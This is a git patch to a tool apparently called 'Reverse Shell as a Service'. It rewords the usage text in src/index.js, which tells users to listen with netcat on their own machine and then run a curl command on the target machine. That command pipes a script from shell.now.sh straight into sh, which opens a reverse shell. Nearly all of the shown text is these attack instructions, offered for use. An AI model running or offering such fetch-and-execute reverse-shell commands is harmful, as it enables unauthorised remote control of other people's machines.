From 83564a207ea1617214f1ece87fcce3af00d3227c Mon Sep 17 00:00:00 2001 From: Luke Childs Date: Thu, 14 Sep 2017 13:46:25 +0100 Subject: [PATCH] Simplify web instructions --- src/index.js | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/src/index.js b/src/index.js index 34d4306..815d82b 100644 --- a/src/index.js +++ b/src/index.js @@ -3,11 +3,11 @@ const usage = `# Reverse Shell as a Service # https://github.com/lukechilds/reverse-shell # -# 1. On your machine, open up a port and listen to it with netcat +# 1. On your machine: # nc -l 1337 # -# 2. On the target machine, pipe the output of https://shell.now.sh/yourhostnameorip:port into sh -# curl https://shell.now.sh/192.168.0.69:1337 | sh +# 2. On the target machine: +# curl https://shell.now.sh/yourip:1337 | sh # # 3. Don't be a dick`;